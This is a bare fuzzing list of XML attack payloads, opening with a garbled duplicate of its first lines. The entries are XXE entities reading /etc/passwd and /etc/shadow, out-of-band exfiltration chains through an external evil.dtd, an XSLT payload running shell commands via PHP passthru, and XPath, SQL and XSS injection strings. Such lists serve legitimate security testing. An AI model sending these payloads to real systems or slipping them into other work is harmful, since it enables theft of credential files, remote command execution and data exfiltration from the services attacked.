Fuzzing 1 !ENTITY % xxe SYSTEM " php://filter/convert.base64-encode/resource=/etc/passwd " 2 ?xml version= " 1.0 " encoding= " ISO-8859-1 " ? 3 !DOCTYPE xxe [!ENTITY foo " aaaaaa " ] 4 !DOCTYPE xxe [!ENTITY foo " aaaaaa " ]rootfoo;/root 5 ?
Fuzzing
1 <!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd" > 2 <?xml version="1.0" encoding="ISO-8859-1"?> 3 <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]> 4 <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root> 5 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]> 6 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root> 7 <?xml version="1.0" encoding="ISO-8859-1"?><test></test> 8 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> 9 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 10 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]><foo>&xxe;</foo> 11 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]> 12 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo> 13 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]> 14 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> 15 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]> 16 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com:80" >]><foo>&xxe;</foo> 17 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example:443" >]> 18 <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo> 19 <test></test> 20 <![CDATA[<test></test>]]> 21 &foo; 22 %foo; 23 count(/child::node()) 24 x‘ or name()=‘username‘ or ‘x‘=‘y 25 <name>‘,‘‘)); phpinfo(); exit;/*</name> 26 <![CDATA[<script>var n=0;while(true){n++;}</script>]]> 27 <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(‘XSS‘);<![CDATA[<]]>/SCRIPT<![CDATA[>]]> 28 <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(‘XSS‘);<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> 29 <foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(‘XSS‘);<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> 30 <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[‘ or 1=1 or ‘‘=‘]]></foo> 31 <foo><![CDATA[‘ or 1=1 or ‘‘=‘]]></foo> 32 <xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(‘XSS‘);">]]> 33 <xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert(‘XSS‘)"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 34 <xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 35 <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> 36 <xml SRC="xsstest.xml" ID=I></xml> 37 <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML> 38 <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> 39 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><script>alert(123)</script></xsl:template></xsl:stylesheet> 40 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:copy-of select="document(‘/etc/passwd‘)"/></xsl:template></xsl:stylesheet> 41 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"><xsl:template match="/"><xsl:value-of select="php:function(‘passthru‘,‘ls -la‘)"/></xsl:template></xsl:stylesheet> 42 <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 43 <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]> 44 <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]> 45 <!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://example.com/text.txt" >]> 46 <!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]> 47 <!ENTITY % int "<!ENTITY % trick SYSTEM ‘http://127.0.0.1:80/?%file;‘> "> %int; 48 <!ENTITY % param3 "<!ENTITY % exfil SYSTEM ‘ftp://127.0.0.1:21/%data3;‘>"> 49 <!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///etc/issue"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]> 50 <!DOCTYPE xxe [ <!ENTITY % file SYSTEM "file:///c:/boot.ini"><!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">%dtd;%trick;]> 51 <soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>